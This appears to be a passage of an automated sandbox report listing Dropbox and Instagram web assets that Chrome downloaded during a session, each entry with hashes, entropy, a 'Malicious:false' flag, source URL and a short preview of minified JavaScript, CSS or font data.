                                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1709)
                                                                        Category:downloaded
                                                                        Size (bytes):2088
                                                                        Entropy (8bit):5.495156086208875
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CC4FC608C4C05C3592DF7B9860F0D8FE
                                                                        SHA1:473C0A62D060A4F1A35D940731069C671291BF15
                                                                        SHA-256:ABED8B60C4B029CC59480D5ADA1BAECF5A3F45207486EED2C0CC7C9C13BD87DD
                                                                        SHA-512:2A3F4A0447CF615BF979CD34E78BA68FD0760E0707EDCC02E4DCBF7DCC20E08CC8BC02C22EA8072908AFBFF6B952B982F820912B43185B928BDE549C2D6F2051
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-logos_src_glyph_fss-vflzE_GCM.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="4cca2966-d554-3c4e-8dd5-95993bfd46db")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var r=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,r.get?r:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var r=l(t);e.DropboxDocSendLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M11.746 5h6.691v7l-6.691-7v7h6.7v.485c0 4.424-2.688 6.515-6.7 6.515-4.192 0-6.692-2.053-6.692-6.517v-.875C5.054 7.318 7.756 5 11.746 5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.FailFill=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):305
                                                                        Entropy (8bit):5.074758848509232
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:435D06AC9753D09AD6460021115C7912
                                                                        SHA1:3402A18674394D69D059C531DC4284E8665EC665
                                                                        SHA-256:F9715837A4B11A1B21CC4FFAB6DAA0CAF2AAA6FD53615772B9CB4E375391B8A2
                                                                        SHA-512:EAF3187C1959F133708367E40183685316C7E5479C77C04EE8046606E483031D6042671E352A6C6F30B8100225D59D91FA6EF4CB95716AB371C456D05E4C4855
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/susi/email.module.out-vflQ10GrJ.css
                                                                        Preview:._hide-password_vs4tt_4{display:none}._email-check-button_vs4tt_8{margin-top:var(--dwg-spacing__unit--3,24px)}._submit-container_vs4tt_12{display:flex;flex-direction:column}._passkey-button_vs4tt_17{display:flex;margin-top:var(--dwg-spacing__unit--3,24px)}./*# sourceMappingURL=email.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (21784)
                                                                        Category:downloaded
                                                                        Size (bytes):22151
                                                                        Entropy (8bit):5.298970045398465
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4CD956604FD9F60C5E6851F936DD5AAC
                                                                        SHA1:00CD41D2F04ECB00D839B7EBE2A40AA5E1AD549C
                                                                        SHA-256:056B94E09ADBD2F7961CE2C39BC210B6973B88400CFE0B4DCCB910BC125EED36
                                                                        SHA-512:3890F452C7D743B6DD1D74FC3B40CFA84A0E749195A65F5EB1F7E8F87B8538123955F92400C66EB3D48688550597EB93B572B71575A93164BA0E722E0FB87970
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_core_notify-vflTNlWYE.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="49fee749-e743-384a-b651-8ccacd571dc7")}catch(e){}}();.define(["exports","react-dom","react","./e_edison"],(function(e,t,n,r){"use strict";function i(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var o=i(t),a=i(n);function s(e,t,n,i=document,o="js:require_css",a="undefined"!=typeof jest){if(a)return Promise.resolve().then(t);const s=r.getOrCreateCache(i);return r.loadCssWithCache(i,s,new URL(r.static_url(e)),o).then(t,n)}const c=/[^\w@\.\ \-\(\)\,\$~%#\[\]\{\}\!\^]/g,l=e=>`&#${e.charCodeAt(0)};`,u=e=>`${e}`.replace(c,l);function d(e){return"object"==type
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 124498
                                                                        Category:dropped
                                                                        Size (bytes):26514
                                                                        Entropy (8bit):7.98520324412033
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:815098291790082B40C82A61AFAB3BA8
                                                                        SHA1:8516522A82AB9B9BCAC62C4448BC05584F8AF926
                                                                        SHA-256:8647CD6A7E13A8A821F72DDB4C5A77D31F8A6FEA83A6D16DBD2C95B4BC7DA23A
                                                                        SHA-512:5F24F27AA897F2304B5EF3DE82806416D3904AF3505F4015C89E0EE7862431FDBBE29D0C170D063BFDDDAFD5A8B3B62BA2E4029AC5EC6FB76C5C3ADF5C006090
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........k..Gr-.].b..$.]....c`..v..M.................s|...Z...jRj.-a...;*kW._+VD<.....W._~...'?......}..._..._......?....../..>...?........O..~.....|.......g.........^........}.....w_....y...O?>............./>....../n...;..............?........?.}....-.~....?....~aOv..........b..]..{.7.|......w..../...W/..b..M..{.W7...O.g7....?..........^.w...K......_....?.Z~.%....n.z..7.R~}.?..._}.4.......7t.|..7....?....W...../.R.z>...7.....y...=..._}....Q..7...7................+.q...{........'.....?......?..K...?^>....V..x.{..o.8z.....?<.y...w.K.-|rs..........>..[..}..7.^.^...|...W.....^|z.y.......7.^~....m_.7.P....O>~..W.....On..............._..._...7.?..Y>..._}...O_.|...|....7.....z...~.._?...'........W.......z..._...z..?....%.e..}.........?...._...?.....;.S.............7.~........{...'7....'O}=....."a.........B.k.....;{.Y...._~.w...._....~.........<..?..Lc......+......../.-.......|...=...O.|O.>Z. i+9.K.*..\.e..N.|
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (44341)
                                                                        Category:downloaded
                                                                        Size (bytes):44733
                                                                        Entropy (8bit):5.401903749074722
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:768CFDF52F4C092C2FE90E6ED4486177
                                                                        SHA1:30F9C4E2DDD7DBD24C0E7D0CDEB6456F255C4E83
                                                                        SHA-256:D075CD2CEE2C01A69EF4F05714E050E9F17B9984E8464787F7FB7D8803C12FAE
                                                                        SHA-512:12F001D03E4B9258DE9C9A1923C701023E74FD953133C3B01EF83910FCE2836242DF3C082157AF11C6FF4D062F2696CFCDB4BDDCECCD36FB9E03C316D513DCF7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_api_v2_routes_user_metadata_provider-vfldoz99S.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ff9db77a-5be1-3d82-8c82-4835573d677a")}catch(e){}}();.define(["exports","./e_core_exception"],(function(e,t){"use strict";function n(e,t){if(!e)throw new Error(t)}const r=34028234663852886e22,i=-34028234663852886e22,s=4294967295,a=2147483647,o=-2147483648;function c(e){if("number"!=typeof e)throw new Error("invalid int 32: "+typeof e);if(!Number.isInteger(e)||e>a||e<o)throw new Error("invalid int 32: "+e)}function u(e){if("number"!=typeof e)throw new Error("invalid uint 32: "+typeof e);if(!Number.isInteger(e)||e>s||e<0)throw new Error("invalid uint 32: "+e)}function l(e){if("number"!=typeof e)throw new Error("invalid float 32: "+typeof e);if(Number.isFinite(e)&&(e>r||e<i))throw new Error("invalid float 32: "+e)}const f=Symbol("@bufbuild/protobuf/enum-type");function d(e){const t
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (540)
                                                                        Category:downloaded
                                                                        Size (bytes):1433
                                                                        Entropy (8bit):5.072288267058015
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0FCFA90D8502F01911C8801E8A7AADE9
                                                                        SHA1:BC05903CB0ABDF9968F1B872750125D24CE1671B
                                                                        SHA-256:B571FE59FDC417E9D3A46B667F0D07978217F4F9743CAA0A838165D1A235AA37
                                                                        SHA-512:3B25C54C11F4D9DA4F4D5381E74E8B05DD2B5F9030E49DAE798AFB2FE7CE07FF99EBB0795BA4CA87C9549C43EFDEE37E336405CC92EA23FF3EB2D24B1380CD4A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/yp/r/7sm6EIbtFjH.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("PolarisAccountRecoveryPasswordResetRoot.entrypoint",["JSResourceForInteraction"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(a){return{queries:{}}},root:c("JSResourceForInteraction")("PolarisAccountRecoveryPasswordResetRoot.react").__setRef("PolarisAccountRecoveryPasswordResetRoot.entrypoint")};g["default"]=a}),98);.__d("PolarisEmailSignupRoot.entrypoint",["JSResourceForInteraction","usePolarisLoggedOutExperimentQuery$Parameters"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(a){return{queries:{hideFullNameFieldExperimentQueryReference:{parameters:b("usePolarisLoggedOutExperimentQuery$Parameters"),variables:{checks:[{name:"ig_mweb_signup_changes",param:"hide_full_name_field"}]}}}}},root:c("JSResourceForInteraction")("PolarisEmailSignupRoot.react").__setRef("PolarisEmailSignupRoot.entrypoint")};g["default"]=a}),98);.__d("PolarisMultiStepSignupRoot.entrypoint",["JSResourceForInteraction","usePolarisLoggedOutExperimentQuery
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3196)
                                                                        Category:downloaded
                                                                        Size (bytes):3592
                                                                        Entropy (8bit):5.173413839499217
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:640250BF2A3895B8AF0FC07EA2A32657
                                                                        SHA1:773A570E24A3D3524303861974B450347A7AAA57
                                                                        SHA-256:87E5B3F41104E886C7D377429FB7307EDC9DD70C746234DC954711C532D1CE6D
                                                                        SHA-512:8BD8EFE00FCB12C1C603F4ED996A470725AD793FE8D4A1F8EB262C2AB53E47D9AD9D943F8BDFB8495CE7FD72C612F8F0FEE8290E92CE3952732A131CCA925EE7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_teams_idle_timeout_pagelet.after-display-vflZAJQvy.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6e810b92-00ca-345f-9486-80b6eacdcaeb")}catch(e){}}();.define(["exports","./e_file_viewer_static_scl_page_file","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_plugin_utils_getImageDefaultSizes","./c_api_v2_routes_user_metadata_provider","metaserver/static/js/langpack","./e_edison","./c_pap-events_sign_save_signature_doc","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_memoize-one","./c_api_v2_noauth_client","metaserver/static/js/modules/constants/viewer","./c_security_csrf_hmac"],(function(e,t,s,i,r,o,c,n,a,h,d,v,_,m,u,p,I,l,y,A,R,F){"use strict";const f=["keypress","keydown","click","contextmenu","dblclick
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1539)
                                                                        Category:downloaded
                                                                        Size (bytes):1944
                                                                        Entropy (8bit):5.501274786655817
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E5ECE76CBA9BC3BCA640E8B925C7DFCE
                                                                        SHA1:A4467A9ABDBB95ABC81DD3EB45D1D92EFBD01109
                                                                        SHA-256:60CB295B38FE76E62DC013AC0B76E6E96F4D34182167546777A9DB0726107BBD
                                                                        SHA-512:4E7CA2CA776C5B08CFCC9F4933B7E29E88DC629B09DA60F1FD1605AFCB3B273E77DA0E613DABEF44057090A684286B4DF07E6995702C013B6920B0A4B8A050B2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-content-icons_icons_folder-base-default-large-vfl5eznbL.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dcf78f85-f6b1-3981-9723-5428f0f40972")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_hooks_useContentIconViewbox"],(function(e,t,c){"use strict";function a(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var a=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,a.get?a:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=a(t);e.FolderBaseDefaultLarge=({className:e,hasWhitespace:t=!0,...a})=>{const o=c.classNames(["dig-ContentIcon",e,"dig-ContentIcon--large"]),r=c.useLargeContentIconViewBox({hasWhitespace:t,type:"folder"});return n.createElement("svg",{viewBox:r,fill:"none",role:"presentation",focusable:"false",width:160,height:160,className:o,"data
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (16262)
                                                                        Category:downloaded
                                                                        Size (bytes):757859
                                                                        Entropy (8bit):5.604818822097475
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:86406CEB27B5A1FAE1A61B76F76DF652
                                                                        SHA1:17DDEEC0853DB9858D7EEF4286E2F83D7872BE8A
                                                                        SHA-256:9B6B26AD886313E6EBEDF5ABCB77A234D1F74F4A8A0B260805F4A955BE1E5181
                                                                        SHA-512:7C0D61383C32C6623AD9582CA518720C6D907A220213D362E0F4E55334B039B07302348F81894F035633D01313DE1FE8DE9B53501116221A8E254E1A0EB246F0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3iY4r4/yf/l/en_US/WUH7iTdWbNO_AL7gvmBALy3vA7-EqqL8o44gd1u871dT8qVK4Tlw0eK0iuK04MRz8Rvkz1sQcjLUs8ZhFgI1FwUiEsQPH1cEvSLMxeXH8Qhh54JNwhPDu-EkBP3nGLwemIi2UTaKnle4uAa3JcgLkFjPkpDmT2Xi78GO_SvF2C7NJyq0UNNplwE91K64sspJFcaesT-N4ATj7AoYQ-aarB77Gpav51j1H8BJAaXCY3A1UiSWOLvsWqehdEtWwbHhaAda_i25k8w9oFpyOtJbYupQ0yi8wH1-RfokkNf3c12LiJjUdcQGCcMX5ABpjcZCpLlkdGCSmZ.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("regenerator-runtime-0.13.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(a){var b=Object.prototype,c=b.hasOwnProperty,d,e=typeof Symbol==="function"?Symbol:{},g=e.iterator||"@@iterator",h=e.asyncIterator||"@@asyncIterator",i=e.toStringTag||"@@toStringTag";function j(a,b,c,d){b=b&&b.prototype instanceof q?b:q;b=Object.create(b.prototype);d=new B(d||[]);b._invoke=x(a,c,d);return b}a.wrap=j;function k(a,b,c){try{return{type:"normal",arg:a.call(b,c)}}catch(a){return{type:"throw",arg:a}}}var l="suspendedStart",m="suspendedYield",n="executing",o="completed",p={};function q(){}function r(){}function s(){}e={};e[g]=function(){return this};var t=Object.getPrototypeOf;t=t&&t(t(C([])));t&&t!==b&&c.call(t,g)&&(e=t);var u=s.prototype=q.prototype=Object.create(e);r.prototype=u.constructor=s;s.constructor=r;s[i]=r.displayName="GeneratorFunction";function v(a){["
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 31220, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):31220
                                                                        Entropy (8bit):7.9922945477639304
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:BD65225294E9AD1114DED0A8BDE4D38B
                                                                        SHA1:B4AD89CF62BA389A9FE273E3154F0C509B36F79C
                                                                        SHA-256:15ACF74F7B49F0E1684532D3B16624880610E0CE41E4518696DC6568FCF0612E
                                                                        SHA-512:769E0CA17D129A8E8DD77C1426526F630AA7B15DC6C6592ADEB33D573894D1282398FEC044229F00ED9DF21BFA390AD567695EC0EFE814EBC92C63FCBA85EF29
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/KaTeX_Main-Regular.woff2
                                                                        Preview:wOF2......y...........y.........................?FFTM..`..J.:........H....6.$.....L.. ..}..F......G.m.4L.m.....Lfv ......J....nR.1..I.6.?.^....&..(.USn}..}........f...*wa.M...xU..OR.c..z.3^Q.+.]T.1...b%W%..6q._xc...'4.k.6.w...G(X!^.9.F...h,.{.~Yr....../H.6.0K....'..h)..)........hA...z.2.K.7Z<1....JZ...=4.z.Os.......J..!....$H..!.H ....b....B....I..*[;.nk....v..?....$.h.>f....0....-.$.dl..BuU..5.V}...,.=..hp......5V..ul.3....e:.N*.uG....?..fP.....X..l..YS...+....p.o....;E....\......=..}BQ..a.r@......q91+1.qN\.o..+.c[.A...q...U_..........Ei.V.IHV.,...3...;....].0$lH.d.@ i..... .}..).....&p..u...8..3.... ......|..0}(...76nN...t...A@+....&L6.....C.K,.)n.OI. n,DK.V.........u.4.){..+..VvI.ZNX*..'.......e...O...7..{..S..~.o...........?d.y.l........5.=g.K.L....o5+..".....]9s......I2......1.V....g..R.CUO.:i....._:.k.@Mj....!.7w.C.x.k.....*..WI.*I.J`..cK.A%.-..RI.H`..v.h{R.SF"J.n..5x..'.t..{..q.{8.|.....S...vk...4..B.............t......n..J...%R.X..).0$
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (9586)
                                                                        Category:downloaded
                                                                        Size (bytes):9587
                                                                        Entropy (8bit):5.076530007287422
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:53A288476541A8A0E790FC62E77B6FB9
                                                                        SHA1:FFB02CE6E09E61EB494BDE86E21A225F01C58EDA
                                                                        SHA-256:FB41B7F75A350B961521693271414222486CB98B099D0D68DFF83765F412CA94
                                                                        SHA-512:D23D810D2B69F86A3CB082128E405768BFBB8436E67650729072FD33D5B18DB6CAA76FC2E2B50422F83ACBFF273CD807C3274ABEE222AE2D6A0E03581D3E2D31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/font_sharp_grotesk-vflU6KIR2.css
                                                                        Preview:@font-face{font-family:'SharpGroteskSuperCondensed';font-display:swap;src:url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook11-vflIBQIXn.eot");src:url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook11-vflIBQIXn.eot?#iefix") format("embedded-opentype"),url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook11-vflIUABa0.woff2") format("woff2"),url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook11-vflyOWHzZ.woff") format("woff"),url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook11-vflzrCLFX.ttf") format("truetype");font-weight:400;font-style:normal}@font-face{font-family:'SharpGroteskSuperCondensed';font-display:swap;src:url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBMedium11-vflVqGBL6.eot");src:url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBMedium11-vflVqGBL6.eot?#iefix") format("embedded-opentype"),url("/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBMedium11-v
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48801)
                                                                        Category:dropped
                                                                        Size (bytes):49171
                                                                        Entropy (8bit):5.272432492606695
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4E960A52B00F82D16C3AAC892BA68C8D
                                                                        SHA1:F0DE6406CFB40021DA602C8BEAE99B31FA8507EB
                                                                        SHA-256:4660A70D395326BDF72EECDDD4D38816E011581EDCC4DE39BA8D9E9781BFCCB9
                                                                        SHA-512:B6FBBA682CAA7F964DF03305403426F4C812BFCA02A45291558895F323598A5BCDC6491DB8B1E6A90D5A61570E51781C6DB0B1FD0823229CFC98898FED06BB5E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="918caab9-9aed-3016-89fc-9b23c9636472")}catch(e){}}();.define(["require","exports","./c_plugin_utils_getImageDefaultSizes","./c_api_v2_routes_user_metadata_provider","./c_lodash","./e_core_exception"],(function(e,t,n,s,i,r){"use strict";class o extends s.Message{constructor(e){super(),this.seconds=s.protoInt64.zero,this.nanos=0,s.proto3.util.initPartial(e,this)}fromJson(e,t){if("string"!=typeof e)throw new Error(`cannot decode google.protobuf.Timestamp from JSON: ${s.proto3.json.debug(e)}`);const n=e.match(/^([0-9]{4})-([0-9]{2})-([0-9]{2})T([0-9]{2}):([0-9]{2}):([0-9]{2})(?:Z|\.([0-9]{3,9})Z|([+-][0-9][0-9]:[0-9][0-9]))$/);if(!n)throw new Error("cannot decode google.protobuf.Timestamp from JSON: invalid RFC 3339 string");const i=Date.parse(n[1]+"-"+n[2]+"-"+n[3]+"T"+n[4]+":"+n[5
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (866)
                                                                        Category:dropped
                                                                        Size (bytes):1233
                                                                        Entropy (8bit):5.360300423699211
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BCDE2D42EAF5572B8902B80A7788A53F
                                                                        SHA1:D1707B3C51E1ED780258B2F405B7D83D6BB43749
                                                                        SHA-256:1AD5F344CB29B7721B31EFFA291422DDA6B9AF66836D813A6B75745367319901
                                                                        SHA-512:D8D3BDDED93DA7B1B6C0EEFFB53B0CB76CCE2025C245DE5B83E4D2F7E498FC69D3679EB82E4472B091547A83567516AC7188A7092434D21AE27B85B95E2BE67B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="44672d4b-5e4e-3345-9dca-dda0b5220f37")}catch(e){}}();.define(["exports","./c_api_v2_routes_user_metadata_provider"],(function(n,e){"use strict";var t=Number.isNaN||function(n){return"number"==typeof n&&n!=n};function r(n,e){if(n.length!==e.length)return!1;for(var r=0;r<n.length;r++)if(o=n[r],i=e[r],!(o===i||t(o)&&t(i)))return!1;var o,i;return!0}n.GetFoldersInfoRoutes=function(n){return n.ns("folders_info")},n.assertDropboxDomain=function(n){const e=".dropbox.com",t=document.createElement("a");t.href=n;const r=t.hostname||window.location.hostname;if(-1===r.indexOf(e,r.length-12))throw new Error("Cannot send the CSRF token to "+r)},n.memoizeOne=function(n,e){var t;void 0===e&&(e=r);var o,i=[],s=!1;return function(){for(var r=[],u=0;u<arguments.length;u++)r[u]=arguments[u];return s
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1808)
                                                                        Category:downloaded
                                                                        Size (bytes):2206
                                                                        Entropy (8bit):5.408668018205082
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C787142794B37901A9D1A9EFD7B31B20
                                                                        SHA1:B92E2FAA9F7F5A3FA13FCE4AB08583E4E6236CF5
                                                                        SHA-256:24EB4D3B55CC62E77FE7A1B894A12C73C587AEECFEF8856AC671FF841ED5A598
                                                                        SHA-512:9F5F33B6D86A0F10174E5C51C473A9EB3685B1C6611B90B32C12C64E3EBB8ECA5DBBAF8D1426AD4342182AA2C16A271C4DDECB40E08037AE7DD7E0879D526EE8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_notification-vflx4cUJ5.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="41d3cde1-6496-37e1-813c-417a9616409a")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.AudioLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m6 14 .01-3 1.5.015-.01 3L6 14Zm12 0v-3h1.5v3H18Zm-6 2V9h1.5v7H12Zm-3 4V4h1.5v16H9Zm6-2.5V7h1.5v10.5H15Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.MemberTransferLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none"
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2017)
                                                                        Category:downloaded
                                                                        Size (bytes):2396
                                                                        Entropy (8bit):5.428274756944604
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B90E922A58B16D2C365554045996431D
                                                                        SHA1:6C6705B062C31996A7B824E39F809A8DFE6AD29C
                                                                        SHA-256:4CCC77B07CF87C1478B3972B100C2D208C7500B08981E6470BAA0FF03F5EE784
                                                                        SHA-512:117A943A39ACAA306B09F5BF3A9F1BC9AE7FA5F9F2DC1AAB5FAB25F5FF783847E99457B4B70D0B4C1E34C41E82BAD52B8016CBAA34EF22B5F96984A3BCE585C9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_react-use_useEffectOnce-vfluQ6SKl.js
